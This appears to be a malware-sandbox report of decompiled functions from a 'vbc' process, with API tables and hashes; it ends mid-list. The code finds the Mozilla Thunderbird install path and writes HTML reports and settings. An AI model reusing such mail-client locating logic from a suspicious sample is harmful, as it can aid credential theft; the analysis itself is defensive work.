                                                                                                                                                                        0x0040fc57
                                                                                                                                                                        0x0040fc5f
                                                                                                                                                                        0x0040fc68
                                                                                                                                                                        0x0040fc71
                                                                                                                                                                        0x0040fc7f
                                                                                                                                                                        0x0040fc81
                                                                                                                                                                        0x0040fc81
                                                                                                                                                                        0x0040fc85
                                                                                                                                                                        0x0040fc87
                                                                                                                                                                        0x0040fc94
                                                                                                                                                                        0x0040fc96
                                                                                                                                                                        0x0040fc96
                                                                                                                                                                        0x0040fc9a
                                                                                                                                                                        0x0040fc9e
                                                                                                                                                                        0x0040fcac
                                                                                                                                                                        0x0040fcae
                                                                                                                                                                        0x0040fcae
                                                                                                                                                                        0x0040fcac
                                                                                                                                                                        0x0040fc9a
                                                                                                                                                                        0x0040fc85
                                                                                                                                                                        0x0040fcbb
                                                                                                                                                                        0x0040fb07
                                                                                                                                                                        0x0040fb14
                                                                                                                                                                        0x0040fb1a
                                                                                                                                                                        0x0040fb2a
                                                                                                                                                                        0x0040fb2d
                                                                                                                                                                        0x0040fb32
                                                                                                                                                                        0x0040fc46
                                                                                                                                                                        0x0040fb3a
                                                                                                                                                                        0x0040fb3c
                                                                                                                                                                        0x0040fb42
                                                                                                                                                                        0x0040fb47
                                                                                                                                                                        0x0040fb48
                                                                                                                                                                        0x0040fb4d
                                                                                                                                                                        0x0040fb52
                                                                                                                                                                        0x0040fb61
                                                                                                                                                                        0x0040fb67
                                                                                                                                                                        0x0040fb79
                                                                                                                                                                        0x0040fb7f
                                                                                                                                                                        0x0040fb8a
                                                                                                                                                                        0x0040fb8b
                                                                                                                                                                        0x0040fb96
                                                                                                                                                                        0x0040fb9b
                                                                                                                                                                        0x0040fb9c
                                                                                                                                                                        0x0040fbb8
                                                                                                                                                                        0x0040fbbd
                                                                                                                                                                        0x0040fbc3
                                                                                                                                                                        0x0040fbc5
                                                                                                                                                                        0x0040fbc6
                                                                                                                                                                        0x0040fbcb
                                                                                                                                                                        0x0040fbd0
                                                                                                                                                                        0x0040fbd2
                                                                                                                                                                        0x0040fbd2
                                                                                                                                                                        0x0040fbda
                                                                                                                                                                        0x0040fbf2
                                                                                                                                                                        0x0040fbf3
                                                                                                                                                                        0x0040fbfa
                                                                                                                                                                        0x0040fc02
                                                                                                                                                                        0x0040fc03
                                                                                                                                                                        0x0040fc13
                                                                                                                                                                        0x0040fc26
                                                                                                                                                                        0x0040fc2b
                                                                                                                                                                        0x0040fc2b
                                                                                                                                                                        0x0040fc03
                                                                                                                                                                        0x0040fbda
                                                                                                                                                                        0x0040fc2e
                                                                                                                                                                        0x0040fc3e
                                                                                                                                                                        0x0040fc43
                                                                                                                                                                        0x0040fc43
                                                                                                                                                                        0x0040fc51
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040fc51

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040FACA
                                                                                                                                                                        • memset.MSVCRT ref: 0040FAE2
                                                                                                                                                                          • Part of subcall function 0040F1B0: RegOpenKeyExA.KERNELBASE(80000002,80000002,00000000,00020019,80000002,0040F559,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00000000,?,?,00000104), ref: 0040F1C3
                                                                                                                                                                        • memset.MSVCRT ref: 0040FB1A
                                                                                                                                                                          • Part of subcall function 0040F276: RegEnumKeyExA.ADVAPI32 ref: 0040F299
                                                                                                                                                                        • _mbsnbicmp.MSVCRT ref: 0040FB48
                                                                                                                                                                        • memset.MSVCRT ref: 0040FB67
                                                                                                                                                                        • memset.MSVCRT ref: 0040FB7F
                                                                                                                                                                        • _snprintf.MSVCRT ref: 0040FB9C
                                                                                                                                                                        • _mbsrchr.MSVCRT ref: 0040FBC6
                                                                                                                                                                        • _mbsicmp.MSVCRT ref: 0040FBFA
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?), ref: 0040FC13
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?), ref: 0040FC26
                                                                                                                                                                        • RegCloseKey.ADVAPI32(0040FD0A), ref: 0040FC51
                                                                                                                                                                        • strcpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FC5F
                                                                                                                                                                        • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104,?,?,?,?,?,?,?,?,00000000), ref: 0040FC71
                                                                                                                                                                        • GetCurrentDirectoryA.KERNEL32(00000104,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040FC9E
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memset$strcpy$CloseCurrentDirectoryEnumEnvironmentExpandOpenStrings_mbsicmp_mbsnbicmp_mbsrchr_snprintf
                                                                                                                                                                        • String ID: %programfiles%\Mozilla Thunderbird$%s\bin$PathToExe$SOFTWARE\Mozilla$mozilla
                                                                                                                                                                        • API String ID: 3269028891-3267283505
                                                                                                                                                                        • Opcode ID: 2db57c62c4330eedb1a8fe20c988d36466374da2882950982c509ff309ff3e93
                                                                                                                                                                        • Instruction ID: 1ceab4daf47746688ac62aede77486c23684b0aa94ce4f67dad83c1e3abd437f
                                                                                                                                                                        • Opcode Fuzzy Hash: 2db57c62c4330eedb1a8fe20c988d36466374da2882950982c509ff309ff3e93
                                                                                                                                                                        • Instruction Fuzzy Hash: 3851C67194515DBEDB31E7A18D42EDB7BACAF14304F0004FAB684F2141EA789FC98B69
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040F797 Relevance: 27.1, APIs: 12, Strings: 6, Instructions: 101stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 95%
                                                                                                                                                                        			E0040F797(void* __edi, char* _a4, char* _a8) {
				int _v8;
				void _v263;
				char _v264;
				void _v519;
				char _v520;
				intOrPtr _t32;
				void* _t58;
				char* _t60;
				void* _t61;
				void* _t62;

				_t58 = __edi;
				_v264 = 0;
				memset( &_v263, 0, 0xfe);
				_v520 = 0;
				memset( &_v519, 0, 0xfe);
				_t62 = _t61 + 0x18;
				_v8 = 1;
				if( *((intOrPtr*)(__edi + 4)) == 0xffffffff &&  *((intOrPtr*)(__edi + 8)) <= 0) {
					_v8 = 0;
				}
				_t60 = _a4;
				 *_t60 = 0;
				if(_v8 != 0) {
					strcpy(_t60, "<font");
					_t32 =  *((intOrPtr*)(_t58 + 8));
					if(_t32 > 0) {
						sprintf( &_v264, " size=\"%d\"", _t32);
						strcat(_t60,  &_v264);
						_t62 = _t62 + 0x14;
					}
					_t33 =  *((intOrPtr*)(_t58 + 4));
					if( *((intOrPtr*)(_t58 + 4)) != 0xffffffff) {
						sprintf( &_v264, " color=\"#%s\"", E0040F6E2(_t33,  &_v520));
						strcat(_t60,  &_v264);
					}
					strcat(_t60, ">");
				}
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "<b>");
				}
				strcat(_t60, _a8);
				if( *((intOrPtr*)(_t58 + 0xc)) != 0) {
					strcat(_t60, "</b>");
				}
				if(_v8 != 0) {
					strcat(_t60, "</font>");
				}
				return _t60;
			}













                                                                                                                                                                        0x0040f797
                                                                                                                                                                        0x0040f7b2
                                                                                                                                                                        0x0040f7b8
                                                                                                                                                                        0x0040f7c6
                                                                                                                                                                        0x0040f7cc
                                                                                                                                                                        0x0040f7d1
                                                                                                                                                                        0x0040f7d8
                                                                                                                                                                        0x0040f7df
                                                                                                                                                                        0x0040f7e6
                                                                                                                                                                        0x0040f7e6
                                                                                                                                                                        0x0040f7ec
                                                                                                                                                                        0x0040f7ef
                                                                                                                                                                        0x0040f7f1
                                                                                                                                                                        0x0040f7f9
                                                                                                                                                                        0x0040f7fe
                                                                                                                                                                        0x0040f805
                                                                                                                                                                        0x0040f814
                                                                                                                                                                        0x0040f821
                                                                                                                                                                        0x0040f826
                                                                                                                                                                        0x0040f826
                                                                                                                                                                        0x0040f829
                                                                                                                                                                        0x0040f82f
                                                                                                                                                                        0x0040f84b
                                                                                                                                                                        0x0040f858
                                                                                                                                                                        0x0040f85d
                                                                                                                                                                        0x0040f866
                                                                                                                                                                        0x0040f86c
                                                                                                                                                                        0x0040f870
                                                                                                                                                                        0x0040f878
                                                                                                                                                                        0x0040f87e
                                                                                                                                                                        0x0040f883
                                                                                                                                                                        0x0040f88d
                                                                                                                                                                        0x0040f895
                                                                                                                                                                        0x0040f89b
                                                                                                                                                                        0x0040f89f
                                                                                                                                                                        0x0040f8a7
                                                                                                                                                                        0x0040f8ad
                                                                                                                                                                        0x0040f8b3

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040F7B8
                                                                                                                                                                        • memset.MSVCRT ref: 0040F7CC
                                                                                                                                                                        • strcpy.MSVCRT(?,<font,?,?,?,?,?), ref: 0040F7F9
                                                                                                                                                                        • sprintf.MSVCRT ref: 0040F814
                                                                                                                                                                        • strcat.MSVCRT(?,?,?, size="%d",?,?,?,?,?,?), ref: 0040F821
                                                                                                                                                                        • sprintf.MSVCRT ref: 0040F84B
                                                                                                                                                                        • strcat.MSVCRT(?,?,?, color="#%s",00000000,?,?,?,?,?,?,?), ref: 0040F858
                                                                                                                                                                        • strcat.MSVCRT(?,00414E74,?,?,?,?,?), ref: 0040F866
                                                                                                                                                                        • strcat.MSVCRT(?,<b>,?,?,?,?,?), ref: 0040F878
                                                                                                                                                                        • strcat.MSVCRT(?,004097A4,?,?,?,?,?), ref: 0040F883
                                                                                                                                                                        • strcat.MSVCRT(?,</b>,?,?,?,?,?), ref: 0040F895
                                                                                                                                                                        • strcat.MSVCRT(?,</font>,?,?,?,?,?), ref: 0040F8A7
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcat$memsetsprintf$strcpy
                                                                                                                                                                        • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                                                                                        • API String ID: 1662040868-1996832678
                                                                                                                                                                        • Opcode ID: 8a1c3a32b9a96c7bd47b9f04c68cff8eaed577a3d3a668b2d7b8b90f51614222
                                                                                                                                                                        • Instruction ID: 1d89f71d6803e1250473f580c1fd87552222ed23aec69fbe6c7d3cec9cc88889
                                                                                                                                                                        • Opcode Fuzzy Hash: 8a1c3a32b9a96c7bd47b9f04c68cff8eaed577a3d3a668b2d7b8b90f51614222
                                                                                                                                                                        • Instruction Fuzzy Hash: C731E673905714AEC720AA659D42DCBB76CAF14324F1082BFF214A2182D7BC9AD4CA9D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040B031 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 110stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                        			E0040B031(void* __eax, intOrPtr _a4) {
				char _v271;
				char _v532;
				intOrPtr _v536;
				char _v540;
				void _v803;
				char _v804;
				void* __ebx;
				void* __edi;
				char* _t47;
				intOrPtr _t67;
				WINDOWPLACEMENT* _t73;
				void* _t75;
				char* _t83;
				struct HWND__* _t84;
				intOrPtr _t88;
				int _t90;

				_t75 = __eax;
				_v804 = 0;
				memset( &_v803, 0, 0x104);
				GetModuleFileNameA(0,  &_v804, 0x104);
				_t47 = strrchr( &_v804, 0x2e);
				if(_t47 != 0) {
					 *_t47 = 0;
				}
				strcat( &_v804, ".cfg");
				_v536 = _a4;
				_v540 = 0x414c5c;
				_v532 = 0;
				_v271 = 0;
				strcpy( &_v532,  &_v804);
				strcpy( &_v271, "General");
				_t88 =  *((intOrPtr*)(_t75 + 0x36c));
				_t16 =  &_v540; // 0x414c5c
				 *((intOrPtr*)( *_t16 + 4))("ShowGridLines", _t88 + 4, 0);
				_t20 =  &_v540; // 0x414c5c
				 *((intOrPtr*)( *_t20 + 8))("SaveFilterIndex", _t88 + 8, 0);
				_t24 =  &_v540; // 0x414c5c
				 *((intOrPtr*)( *_t24 + 4))("AddExportHeaderLine", _t88 + 0xc, 0);
				_t27 =  &_v540; // 0x414c5c
				 *((intOrPtr*)( *_t27 + 4))("MarkOddEvenRows", _t88 + 0x10, 0);
				_t67 = _v536;
				_a4 = _t67;
				_t90 = 0x2c;
				if(_t67 != 0) {
					_t84 =  *(_t75 + 0x108);
					if(_t84 != 0) {
						_t73 = _t75 + 0x128;
						_t73->length = _t90;
						GetWindowPlacement(_t84, _t73);
					}
				}
				_t35 =  &_v540; // 0x414c5c
				_t36 =  &_v540; // 0x414c5c
				_t83 = _t36;
				 *((intOrPtr*)( *_t35 + 0xc))("WinPos", _t75 + 0x128, _t90);
				if(_a4 == 0) {
					E00401823(_t75);
				}
				_t40 =  &_v540; // 0x414c5c
				return E004087DB( *((intOrPtr*)(_t75 + 0x370)), _t83, _t40);
			}



















                                                                                                                                                                        0x0040b043
                                                                                                                                                                        0x0040b04f
                                                                                                                                                                        0x0040b056
                                                                                                                                                                        0x0040b067
                                                                                                                                                                        0x0040b076
                                                                                                                                                                        0x0040b07f
                                                                                                                                                                        0x0040b081
                                                                                                                                                                        0x0040b081
                                                                                                                                                                        0x0040b090
                                                                                                                                                                        0x0040b098
                                                                                                                                                                        0x0040b0ac
                                                                                                                                                                        0x0040b0b6
                                                                                                                                                                        0x0040b0bd
                                                                                                                                                                        0x0040b0c4
                                                                                                                                                                        0x0040b0d5
                                                                                                                                                                        0x0040b0da
                                                                                                                                                                        0x0040b0e8
                                                                                                                                                                        0x0040b0f9
                                                                                                                                                                        0x0040b101
                                                                                                                                                                        0x0040b112
                                                                                                                                                                        0x0040b11a
                                                                                                                                                                        0x0040b12b
                                                                                                                                                                        0x0040b12e
                                                                                                                                                                        0x0040b144
                                                                                                                                                                        0x0040b147
                                                                                                                                                                        0x0040b151
                                                                                                                                                                        0x0040b154
                                                                                                                                                                        0x0040b155
                                                                                                                                                                        0x0040b157
                                                                                                                                                                        0x0040b15f
                                                                                                                                                                        0x0040b161
                                                                                                                                                                        0x0040b169
                                                                                                                                                                        0x0040b16b
                                                                                                                                                                        0x0040b16b
                                                                                                                                                                        0x0040b15f
                                                                                                                                                                        0x0040b179
                                                                                                                                                                        0x0040b184
                                                                                                                                                                        0x0040b184
                                                                                                                                                                        0x0040b18a
                                                                                                                                                                        0x0040b190
                                                                                                                                                                        0x0040b192
                                                                                                                                                                        0x0040b192
                                                                                                                                                                        0x0040b19d
                                                                                                                                                                        0x0040b1ac

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 0040B056
                                                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,00000000,00000000), ref: 0040B067
                                                                                                                                                                        • strrchr.MSVCRT ref: 0040B076
                                                                                                                                                                        • strcat.MSVCRT(00000000,.cfg), ref: 0040B090
                                                                                                                                                                        • strcpy.MSVCRT(?,00000000,00000000,.cfg), ref: 0040B0C4
                                                                                                                                                                        • strcpy.MSVCRT(00000000,General,?,00000000,00000000,.cfg), ref: 0040B0D5
                                                                                                                                                                        • GetWindowPlacement.USER32(?,?), ref: 0040B16B
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: strcpy$FileModuleNamePlacementWindowmemsetstrcatstrrchr
                                                                                                                                                                        • String ID: .cfg$AddExportHeaderLine$General$MarkOddEvenRows$SaveFilterIndex$ShowGridLines$WinPos$\LA
                                                                                                                                                                        • API String ID: 1301239246-3877392175
                                                                                                                                                                        • Opcode ID: 0827365863aa91c80afc493f8c43d1ccc0429d1286164b8e7b7a3723fcb05fb6
                                                                                                                                                                        • Instruction ID: 0af9f59d4ba14ec1661be341c61033e05a04fd550f4be300a3a65ce9efdf479e
                                                                                                                                                                        • Opcode Fuzzy Hash: 0827365863aa91c80afc493f8c43d1ccc0429d1286164b8e7b7a3723fcb05fb6
                                                                                                                                                                        • Instruction Fuzzy Hash: F2414A72940118AFCB21DB54CC88FDABBBCAB58700F0441E6F509E7191DB749BC8CBA8
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 004095F5 Relevance: 25.7, APIs: 10, Strings: 7, Instructions: 182stringCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                        			E004095F5(intOrPtr* __ebx, intOrPtr _a4, intOrPtr* _a8) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void _v79;
				char _v80;
				void _v131;
				char _v132;
				void _v183;
				char _v184;
				char _v236;
				void _v491;
				char _v492;
				void* __edi;
				void* _t83;
				void* _t100;
				char* _t103;
				intOrPtr* _t120;
				signed int _t121;
				char _t139;
				signed int _t152;
				signed int _t153;
				signed int _t156;
				intOrPtr* _t157;
				void* _t158;
				void* _t160;

				_t120 = __ebx;
				_v492 = 0;
				memset( &_v491, 0, 0xfe);
				_t121 = 0xc;
				memcpy( &_v236, "<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s\r\n", _t121 << 2);
				asm("movsb");
				_t156 = 0;
				_v132 = 0;
				memset( &_v131, 0, 0x31);
				_v184 = 0;
				memset( &_v183, 0, 0x31);
				_v80 = 0;
				memset( &_v79, 0, 0x31);
				_t160 = _t158 + 0x3c;
				_t83 =  *((intOrPtr*)( *__ebx + 0x10))();
				_v12 =  *((intOrPtr*)(__ebx + 0x1b4));
				if(_t83 != 0xffffffff) {
					sprintf( &_v132, " bgcolor=\"%s\"", E0040F6E2(_t83,  &_v492));
					_t160 = _t160 + 0x14;
				}
				E00405F07(_a4, "<table border=\"1\" cellpadding=\"5\">\r\n");
				_v8 = _t156;
				if( *((intOrPtr*)(_t120 + 0x20)) > _t156) {
					while(1) {
						_t152 =  *( *((intOrPtr*)(_t120 + 0x24)) + _v8 * 4);
						if( *((intOrPtr*)((_t152 << 4) +  *((intOrPtr*)(_t120 + 0x34)) + 4)) != _t156) {
							strcpy( &_v80, " nowrap");
						}
						_v28 = _v28 | 0xffffffff;
						_v24 = _v24 | 0xffffffff;
						_v20 = _v20 | 0xffffffff;
						_v16 = _t156;
						_t157 = _a8;
						 *((intOrPtr*)( *_t120 + 0x30))(5, _v8, _t157,  &_v28);
						E0040F6E2(_v28,  &_v184);
						E0040F70E( *((intOrPtr*)( *_t157))(_t152,  *(_t120 + 0x4c)),  *(_t120 + 0x50));
						 *((intOrPtr*)( *_t120 + 0x48))( *(_t120 + 0x50), _t157, _t152);
						_t100 =  *((intOrPtr*)( *_t120 + 0x14))();
						_t153 = _t152 * 0x14;
						if(_t100 == 0xffffffff) {
							strcpy( *(_t120 + 0x54),  *(_t153 + _v12 + 0x10));
						} else {
							_push( *(_t153 + _v12 + 0x10));
							_push(E0040F6E2(_t100,  &_v492));
							sprintf( *(_t120 + 0x54), "<font color=\"%s\">%s</font>");
							_t160 = _t160 + 0x10;
						}
						_t103 =  *(_t120 + 0x50);
						_t139 =  *_t103;
						if(_t139 == 0 || _t139 == 0x20) {
							strcat(_t103, "&nbsp;");
						}
						E0040F797( &_v28,  *((intOrPtr*)(_t120 + 0x58)),  *(_t120 + 0x50));
						sprintf( *(_t120 + 0x4c),  &_v236,  &_v132,  *(_t120 + 0x54),  &_v184,  &_v80,  *((intOrPtr*)(_t120 + 0x58)));
						E00405F07(_a4,  *(_t120 + 0x4c));
						_t160 = _t160 + 0x2c;
						_v8 = _v8 + 1;
						if(_v8 >=  *((intOrPtr*)(_t120 + 0x20))) {
							goto L14;
						}
						_t156 = 0;
					}
				}
				L14:
				E00405F07(_a4, "</table><p>");
				return E00405F07(_a4, 0x413b1c);
			}































                                                                                                                                                                        0x004095f5
                                                                                                                                                                        0x0040960e
                                                                                                                                                                        0x00409615
                                                                                                                                                                        0x0040961c
                                                                                                                                                                        0x00409628
                                                                                                                                                                        0x0040962a
                                                                                                                                                                        0x0040962d
                                                                                                                                                                        0x00409634
                                                                                                                                                                        0x00409638
                                                                                                                                                                        0x00409647
                                                                                                                                                                        0x0040964e
                                                                                                                                                                        0x0040965a
                                                                                                                                                                        0x0040965e
                                                                                                                                                                        0x00409665
                                                                                                                                                                        0x0040966a
                                                                                                                                                                        0x00409676
                                                                                                                                                                        0x00409679
                                                                                                                                                                        0x00409692
                                                                                                                                                                        0x00409697
                                                                                                                                                                        0x00409697
                                                                                                                                                                        0x004096a2
                                                                                                                                                                        0x004096ac
                                                                                                                                                                        0x004096af
                                                                                                                                                                        0x004096b9
                                                                                                                                                                        0x004096bf
                                                                                                                                                                        0x004096ce
                                                                                                                                                                        0x004096d9
                                                                                                                                                                        0x004096df
                                                                                                                                                                        0x004096e2
                                                                                                                                                                        0x004096e6
                                                                                                                                                                        0x004096ea
                                                                                                                                                                        0x004096f2
                                                                                                                                                                        0x004096f5
                                                                                                                                                                        0x00409700
                                                                                                                                                                        0x0040970d
                                                                                                                                                                        0x00409721
                                                                                                                                                                        0x0040972f
                                                                                                                                                                        0x00409736
                                                                                                                                                                        0x00409739
                                                                                                                                                                        0x0040973f
                                                                                                                                                                        0x00409774
                                                                                                                                                                        0x00409741
                                                                                                                                                                        0x00409744
                                                                                                                                                                        0x00409757
                                                                                                                                                                        0x00409760
                                                                                                                                                                        0x00409765
                                                                                                                                                                        0x00409765
                                                                                                                                                                        0x0040977b
                                                                                                                                                                        0x0040977e
                                                                                                                                                                        0x00409782
                                                                                                                                                                        0x0040978f
                                                                                                                                                                        0x00409795
                                                                                                                                                                        0x0040979f
                                                                                                                                                                        0x004097c3
                                                                                                                                                                        0x004097ce
                                                                                                                                                                        0x004097d3
                                                                                                                                                                        0x004097d6
                                                                                                                                                                        0x004097df
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004096b7
                                                                                                                                                                        0x004096b7
                                                                                                                                                                        0x004096b9
                                                                                                                                                                        0x004097e5
                                                                                                                                                                        0x004097ed
                                                                                                                                                                        0x00409805

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.MSVCRT ref: 00409615
                                                                                                                                                                        • memset.MSVCRT ref: 00409638
                                                                                                                                                                        • memset.MSVCRT ref: 0040964E
                                                                                                                                                                        • memset.MSVCRT ref: 0040965E
                                                                                                                                                                        • sprintf.MSVCRT ref: 00409692
                                                                                                                                                                        • strcpy.MSVCRT(00000000, nowrap), ref: 004096D9
                                                                                                                                                                        • sprintf.MSVCRT ref: 00409760
                                                                                                                                                                        • strcat.MSVCRT(?,&nbsp;), ref: 0040978F
                                                                                                                                                                          • Part of subcall function 0040F6E2: sprintf.MSVCRT ref: 0040F701
                                                                                                                                                                        • strcpy.MSVCRT(?,?), ref: 00409774
                                                                                                                                                                        • sprintf.MSVCRT ref: 004097C3
                                                                                                                                                                          • Part of subcall function 00405F07: strlen.MSVCRT ref: 00405F14
                                                                                                                                                                          • Part of subcall function 00405F07: WriteFile.KERNEL32(00413B1C,00000001,00000000,73B74DE0,00000000,?,?,00409460,00000001,00413B1C,73B74DE0), ref: 00405F21
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000012.00000002.844335097.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000012.00000002.844360081.0000000000419000.00000040.00000001.sdmpDownload File
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_18_2_400000_vbc.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: memsetsprintf$strcpy$FileWritestrcatstrlen
                                                                                                                                                                        • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                                                                                        • API String ID: 2822972341-601624466
                                                                                                                                                                        • Opcode ID: 17b7667225c5a6bbdce009f3410a16bb9bd559968b7daa8f1be1712407fa5f11
                                                                                                                                                                        • Instruction ID: ad5d45e3310275bf8c81aed9ad428c342ee671dbf73ea1c77541a84cad310e98
                                                                                                                                                                        • Opcode Fuzzy Hash: 17b7667225c5a6bbdce009f3410a16bb9bd559968b7daa8f1be1712407fa5f11
                                                                                                                                                                        • Instruction Fuzzy Hash: AA615032900214AFDF18DF94CC85EDE7B79EF08314F1001AAFA05A71D2DB79AA95CB59
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        Function 0040A02E Relevance: 25.6, APIs: 17, Instructions: 108windowCOMMON
                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                        C-Code - Quality: 58%
                                                                                                                                                                        			E0040A02E(void* __eax) {
				void* _v36;
				long _v40;
				void* _v44;
				void* _v56;
				long _t21;
				void* _t24;
				long _t26;
				long _t34;
				long _t37;
				intOrPtr* _t40;
				void* _t42;
				intOrPtr* _t44;
				void* _t47;

				_t40 = ImageList_Create;
				_t47 = __eax;
				_t44 = __imp__ImageList_SetImageCount;
				if( *((intOrPtr*)(__eax + 0x198)) != 0) {
					_t37 = ImageList_Create(0x10, 0x10, 0x19, 1, 1);
					 *(_t47 + 0x18c) = _t37;
					 *_t44(_t37, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 1,  *(_t47 + 0x18c));
				}
				if( *((intOrPtr*)(_t47 + 0x19c)) != 0) {
					_t34 =  *_t40(0x20, 0x20, 0x19, 1, 1);
					 *(_t47 + 0x190) = _t34;
					 *_t44(_t34, 1);
					SendMessageA( *(_t47 + 0x184), 0x1003, 0,  *(_t47 + 0x190));
				}
				_t21 =  *_t40(0x10, 0x10, 0x19, 1, 1);
				 *(_t47 + 0x188) = _t21;
				 *_t44(_t21, 2);
				_v36 = LoadImageA( *0x417b94, 0x85, 0, 0x10, 0x10, 0x1000);
				_t24 = LoadImageA( *0x417b94, 0x86, 0, 0x10, 0x10, 0x1000);
				_t42 = _t24;
				 *_t44( *(_t47 + 0x188), 0);
				_t26 = GetSysColor(0xf);
				_v40 = _t26;
				ImageList_AddMasked( *(_t47 + 0x188), _v44, _t26);
				ImageList_AddMasked( *(_t47 + 0x188), _t42, _v40);
				DeleteObject(_v56);
				DeleteObject(_t42);
				return SendMessageA(E004049F1( *(_t47 + 0x184)), 0x1208, 0,  *(_t47 + 0x188));
			}
















                                                                                                                                                                        0x0040a031
                                                                                                                                                                        0x0040a03f
                                                                                                                                                                        0x0040a049
                                                                                                                                                                        0x0040a04f
                                                                                                                                                                        0x0040a05b
                                                                                                                                                                        0x0040a060
                                                                                                                                                                        0x0040a066
                                                                                                                                                                        0x0040a07b
                                                                                                                                                                        0x0040a07b
                                                                                                                                                                        0x0040a084
                                                                                                                                                                        0x0040a090
                                                                                                                                                                        0x0040a095
                                                                                                                                                                        0x0040a09b
                                                                                                                                                                        0x0040a0b0
                                                                                                                                                                        0x0040a0b0
                                                                                                                                                                        0x0040a0bc
                                                                                                                                                                        0x0040a0c1
                                                                                                                                                                        0x0040a0c7
                                                                                                                                                                        0x0040a0fd
                                                                                                                                                                        0x0040a101
                                                                                                                                                                        0x0040a10b
                                                                                                                                                                        0x0040a10d
                                                                                                                                                                        0x0040a111
                                                                                                                                                                        0x0040a122
                                                                                                                                                                        0x0040a12c
                                                                                                                                                                        0x0040a139
                                                                                                                                                                        0x0040a145
                                                                                                                                                                        0x0040a148
                                                                                                                                                                        0x0040a16e

                                                                                                                                                                        APIs
                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040A05B
                                                                                                                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 0040A066
                                                                                                                                                                        • SendMessageA.USER32(?,00001003,00000001,?), ref: 0040A07B
                                                                                                                                                                        • ImageList_Create.COMCTL32(00000020,00000020,00000019,00000001,00000001), ref: 0040A090
                                                                                                                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000001), ref: 0040A09B
                                                                                                                                                                        • SendMessageA.USER32(?,00001003,00000000,?), ref: 0040A0B0
                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000019,00000001,00000001), ref: 0040A0BC
                                                                                                                                                                        • ImageList_SetImageCount.COMCTL32(00000000,00000002), ref: 0040A0C7
                                                                                                                                                                        • LoadImageA.USER32 ref: 0040A0E5
                                                                                                                                                                        • LoadImageA.USER32 ref: 0040A101
